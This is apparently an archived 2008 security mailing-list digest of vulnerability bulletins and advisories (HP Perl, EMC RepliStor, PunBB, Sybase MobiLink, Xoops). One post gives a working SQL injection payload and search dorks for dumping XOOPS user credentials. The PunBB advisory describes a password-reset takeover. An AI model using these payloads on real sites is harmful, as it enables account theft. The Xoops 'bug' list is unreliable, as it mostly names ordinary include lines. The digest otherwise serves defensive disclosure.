[security bulletin] HPSBTU02311 SSRT080001 rev.1 - HP Tru64 UNIX running Perl, Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01362465 Version: 1 HPSBTU02311 SSRT080001 rev.1 - HP Tru64 UNIX running Perl, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-02-19 Last Updated: 2008-02-19 Potential Security Impact: Execution of Arbitrary Code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified in Perl 5.8.7 and earlier running on HP Tru64 UNIX. The vulnerability could be exploited remotely to execute arbitrary code. References: CVE-2007-5116 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The following supported software versions are affected: Perl v5.8.7 and earlier as provided with... HP Tru64 UNIX v 5.1B-4 HP Tru64 UNIX v 5.1B-3 Internet Express (IX) for HP Tru64 UNIX v 6.7 BACKGROUND CVSS 2.0 Base Metrics Reference Base Vector Base Score CVE-2007-5116 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP is releasing the following Early Release Patch (ERP) kits publicly for use by any customer until updates are available in mainstream release patch kits. The resolutions contained in the ERP kits are targeted for availability in the following mainstream kits: The Associated Products CD (APCD) associated with HP Tru64 UNIX v 5.1B-5 Internet Express (IX) for HP Tru64 UNIX v 6.8 The ERP kits use dupatch to install and will not install over any Customer Specific Patches (CSPs) that have file intersections with the ERPs. Contact your service provider for assistance if the installation of the ERPs is blocked by any of your installed CSPs. The ERP kits distribute the following items: Patched version of Perl v 5.8.8 including source code HP Tru64 UNIX Version v5.1B-4 PREREQUISITE: HP Tru64 UNIX v5.1B-4 PK6 (BL27) Name: perl_V51BB27-ES-20080207 Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=perl_V51BB27-ES-20080207 HP Tru64 UNIX Version v5.1B-3 PREREQUISITE: HP Tru64 UNIX v5.1B-3 PK5 (BL26) Name: perl_V51BB26-ES-20080204 Location: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001399-V51BB26-ES-20071207 Internet Express (IX) for HP Tru64 UNIX v 6.7 PREREQUISITE: HP Tru64 UNIX v5.1B-3 PK5 (BL26) or HP Tru64 UNIX v5.1B-3 PK5 (BL26) NOTE: Use the Perl patch kit appropriate to the operating system version MD5 checksums are available from the ITRC patch database main page. From the patch database main page, click Tru64 UNIX, then click verifying MD5 checksums under useful links. PRODUCT SPECIFIC INFORMATION HISTORY Version:1 (rev.1) - 19 February 2008 Initial release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing
Web Hacking Incidents Database Update for Feb 20th
The latest bunch of events added to the Web Hacking Incidents Database include many international incidents. Enjoy. And if you still haven't had a chance to read our 2007 annual report, it is quite fascinating. you can find it at http://www.webappsec.org/projects/whid/statistics.shtml. * In Korea, a Chinese hacker stole 18 Million(!) customers' records from an auction site: http://www.webappsec.org/projects/whid/byid_id_2008-10.shtml. * In Greece and Ecuador government web sites where defaced (http://www.webappsec.org/projects/whid/byid_id_2008-12.shtml, http://www.webappsec.org/projects/whid/byid_id_2008-11.shtml). * In the US a small financial firm in Montana lost the information of all its 226,000 customers (http://www.webappsec.org/projects/whid/byid_id_2008-08.shtml) But the incident I want to focus on this week is one I just added from late last year: In India a large newspaper site was broken into and malware was planted on it (http://www.webappsec.org/projects/whid/byid_id_2007-85.shtml). Why is it important? based on a recent report by WebSense, 51% of the sites hosing malware are legitimate sites that have been broken into. This is a major shift in web based threats. For end users, it is not sufficient anymore to keep to web sites they trust. For site owners it means that protecting their sensitive applications is no longer sufficient. Hackers have a financial incentive to attack any popular page. The direct damage of such an attack, even though invisible, is less visitors as more and more browser add-ons block access to sites hosting malware. The indirect damage is of course a branding and marketing damage. ~ Ofer Ofer Shezaf Work: [EMAIL PROTECTED], +972-9-9560036 #212 Personal: [EMAIL PROTECTED], +972-54-4431119 VP Security Research, Breach Security Chair, OWASP Israel Leader, ModSecurity Core Rule Set Project Leader, WASC Web Hacking Incidents Database Project
Xoops-2.0.16 Remote File Inclusion
In the Script Xoops-2.0.16 are Remote File Inclusion Bugs + Script : xoops-2.0.16-Kararli Discovered By : F10 Contact : [EMAIL PROTECTED] WebSite : http://by-f10.com Greetz : by_emR3 , H0tturk , TaRanTuLa , gsy , ercu_145 , LupuS,m0sted,CyberGhost ... . From: Turkey Description : In the Script Xoops-2.0.16 are Remote File Inclusion Bugs. I show the bugs, in which file are their. xoops-2.0.16-Kararli/ is the script path.. + - bugs: xoops-2.0.16-Kararli/htdocs/notifications.php include_once $lookup_file; xoops-2.0.16-Kararli/htdocs/extras/login.phpinclude $path.'/mainfile.php'; xoops-2.0.16-Kararli/htdocs/include/functions.phprequire_once $hnd_file; xoops-2.0.16-Kararli/htdocs/include/functions.phpinclude_once $hnd_file; xoops-2.0.16-Kararli/htdocs/kernel/notification.phpinclude_once $tags_file; xoops-2.0.16-Kararli/htdocs/kernel/notification.phpinclude_once $lookup_file; xoops-2.0.16-Kararli/htdocs/class/auth/authfactory.phprequire_once $file; xoops-2.0.16-Kararli/htdocs/class/database/databasefactory.php require_once $file; xoops-2.0.16-Kararli/htdocs/class/database/databasefactory.php require_once $file; xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.php $_smarty_results = smarty_core_process_compiled_include($_params, $this); xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.php include($_smarty_compile_path); xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.php include($_smarty_compile_path); xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.php require_once($this-_get_plugin_filepath('function', 'config_load')); xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.php require_once($this-compiler_file); xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.phpfunction _smarty_include($params) xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.php include($_smarty_compile_path); xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.phpfunction _include($filename, $once=false, $params=null) xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.phpreturn include_once($filename); xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty.class.phpreturn include($filename); xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty_Compiler.class.php include_once $plugin_file; xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty_Compiler.class.php include_once $plugin_file; xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty_Compiler.class.php include_once $plugin_file; xoops-2.0.16-Kararli/htdocs/class/smarty/Smarty_Compiler.class.php $output .= \$this-_smarty_include($_params);\n . xoops-2.0.16-Kararli/htdocs/modules/system/admin.phpinclude $admin_dir.'/'.$file.'/xoops_version.php'; xoops-2.0.16-Kararli/htdocs/class/mail/phpmailer/class.phpmailer.php include_once($this-PluginDir . class.smtp.php); xoops-2.0.16-Kararli/htdocs/class/mail/phpmailer/class.phpmailer.php include($lang_path.'phpmailer.lang-'.$lang_type.'.php'); xoops-2.0.16-Kararli/htdocs/class/mail/phpmailer/class.phpmailer.php include($lang_path.'phpmailer.lang-en.php'); xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.display_debug_console.php $smarty-_include($_compile_path); xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.load_plugins.php include_once $_plugin_file; xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.load_resource_plugin.php include_once($_plugin_file); xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.process_cached_inserts.php $smarty-_include($php_resource, true); xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.process_compiled_include.php function smarty_core_process_compiled_include($params, $smarty) xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.process_compiled_include.php $smarty-_include($_include_file_path, true); xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.run_insert_handler.php $smarty-_include($_params['php_resource'], true); xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.smarty_include_php.php $smarty-_include($_smarty_php_resource, $params['smarty_once'], $params['smarty_include_vars']); xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.smarty_include_php.php $smarty-_include($_smarty_php_resource, $params['smarty_once'], $params['smarty_include_vars']);
Re: XOOPS Module wflinks SQL Injection(cid)
fyi - duplicate of http://packetstormsecurity.org/0704-exploits/xoopswflinks-sql.txt On Mon, Feb 18, 2008 at 05:19:20PM -, [EMAIL PROTECTED] wrote: ### # #XOOPS Module wflinks SQL Injection(cid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MA#304;L : [EMAIL PROTECTED] # # # DORK 1 : allinurl: modules/wflinks/viewcat.php # # DORK 2 : allinurl: modules/wflinks # example http://xx.com/modules/wflinks/viewcat.php?cid= [exploit] EXPLOIT : -88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
iDefense Security Advisory 02.19.08: EMC RepliStor Multiple Heap Overflow Vulnerabilities
iDefense Security Advisory 02.19.08 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 19, 2008 I. BACKGROUND EMC RepliStor is a data backup and recovery application for Windows. For more information, visit the vendor's website at the following URL. http://software.emc.com/products/software_az/replistor.htm II. DESCRIPTION Remote exploitation of multiple heap overflow vulnerabilities in EMC Corp.'s RepliStor could allow an unauthenticated attacker to execute arbitrary code with SYSTEM privileges. Multiple vulnerabilities exist within the code responsible for compression. In each case, data is decompressed without consideration for the size of the destination buffer. This results in an exploitable heap overflow. III. ANALYSIS Exploitation of these vulnerabilities results in the execution of arbitrary code with the privileges of the RepliStor Server or Control Server, usually SYSTEM. In order to exploit these vulnerabilities, an attacker needs to be able to connect to the targeted server on TCP port 7144 or 7145. No authentication is required to reach the vulnerable code paths. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in EMC RepliStor version 6.2 SP2. Previous versions may also be affected. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE EMC has issued updates to address this issue. EMC customers can view more details on http://powerlink.emc.com/ by searching the knowledge base for support solution emc179808 or they can contact EMC Software Technical Support at 1-877-534-2867. VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-6426 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/18/2007 Initial vendor notification 12/18/2007 Initial vendor response 02/19/2008 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Stephen Fewer of Harmony Security (www.harmonysecurity.com). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Advisory SE-2008-01: PunBB Blind Password Recovery Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SektionEins GmbH www.sektioneins.de -= Security Advisory =- Advisory: PunBB Blind Password Recovery Vulnerability Release Date: 2008/02/20 Last Modified: 2008/02/20 Author: Stefan Esser [stefan.esser[at]sektioneins.de] Application: PunBB = 1.2.16 Severity: Weak random numbers lead to a blind password recovery vulnerability that allows account takeover Risk: High Vendor Status: Vendor has released PunBB 1.2.17 which fixes this issue Reference: http://www.sektioneins.de/advisories/SE-2008-01.txt Overview: Quote from http://punbb.org/ PunBB is a fast and lightweight PHP-powered discussion board. It is released under the GNU General Public License. Its primary goals are to be faster, smaller and less graphically intensive as compared to other discussion boards. PunBB has fewer features than many other discussion boards, but is generally faster and outputs smaller, semantically correct XHTML-compliant pages. PunBB comes with a password reset feature that allows resetting a forgotten password. When a password reset is requested an email is sent to the user containing a new random password and an activation link that needs to be visited in order for the password change to become effective. Unfortunately it is possible due to several weak random numbers to determine the new random password and the activation link from the outside. This allows taking over any account on the forum including the administrator account. Details: PunBB's password reset functionality uses internally mt_rand() to generate a new password and a new activation link that are both send to the user by email. Unfortunately PunBB initialises the mersenne twister random number generator on every request with a number between 0 and 1.000.000, depending on the current microsecond. This means there are only one million possible new passwords and new activation links. It would be possible to bruteforce this limited area, but the amount of time and traffic that would be required is huge. Because of this a better one shot solution was developed that allows to determine the new password and the new activation link from the result of the request that triggered the password reset. To understand how this is possible it is necessary to know that during the installation PunBB creates a random cookie seed that is used to store login data in the cookie during a visit. This cookie seed generation is not really random, because it is more or less the MD5 hash of the current timestamp. This means it is easily bruteforceable when the attacker has his own user account at the forum. He just needs to use his own login cookie and then check all seconds backwards from the date the admin account was created (see in memberlist). The second component required for the attack to work is PunBB's habit to return a cookie with a randomly generated password, when it receives a wrong login cookie. Because the cookie seed is known it can be used to check which one of the one million possible passwords was generated. By knowing the password we know the seed used in the call to mt_srand() which lets us predict all random numbers during the request. It should be obvious that using this attack on the request that triggers the password reset allows to blindly determine the new password and the new activation link in a few seconds. Both can then be used to takeover the attacked account. Proof of Concept: SektionEins GmbH is not going to release a proof of concept exploit for this vulnerability. Disclosure Timeline: 15. February 2008 - Notified [EMAIL PROTECTED] 19. February 2008 - PunBB developers released PunBB 1.2.17 20. February 2008 - Public Disclosure Recommendation: It is strongly recommended to upgrade to the latest version of PunBB which also fixes additional vulnerabilities reported by third parties. Grab your copy at: http://punbb.org/downloads.php CVE Information: The Common Vulnerabilities and Exposures project (cve.mitre.org) has not assigned a name to this vulnerability yet. GPG-Key: http://www.sektioneins.de/sektioneins-signature-key.asc pub 1024D/48A1DB12 2007-10-04 SektionEins GmbH - Signature Key [EMAIL PROTECTED] Key fingerprint = 4462 A777 4237 E292 F52D 5AFE 7C9C C1AF 48A1 DB12 Copyright 2008 SektionEins GmbH. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHsBeQfJzBr0ih2xIRAqSPAKDp9oJQm3SrouI9fkkAq7fgtRpSrwCg4iOm vc4jP+EeE3nDnfr43Ngbc5w= =aJM7 -END PGP SIGNATURE-
Heap overflow in Sybase MobiLink 10.0.1.3629
### Luigi Auriemma Application: Sybase MobiLink http://www.sybase.com/developer/mobile/sqlanywhere/mobilink Versions: = 10.0.1.3629 Platforms:Windows and Linux/Unix Bug: heap overflow Exploitation: remote Date: 20 Feb 2008 Author: Luigi Auriemma e-mail: [EMAIL PROTECTED] web:aluigi.org ### 1) Introduction 2) Bug 3) The Code 4) Fix ### === 1) Introduction === MobiLink is a centralized synchronization server for mobile platforms included in the Sybase SQL Anywhere package. ### == 2) Bug == The MobiLink server is affected by a heap overflow which happens during the handling of some strings like username, version and remote ID (all pre-auth) when have a lenght major than 128 bytes. ### === 3) The Code === http://aluigi.org/poc/mobilinkhof.zip ### == 4) Fix == No fix ### --- Luigi Auriemma http://aluigi.org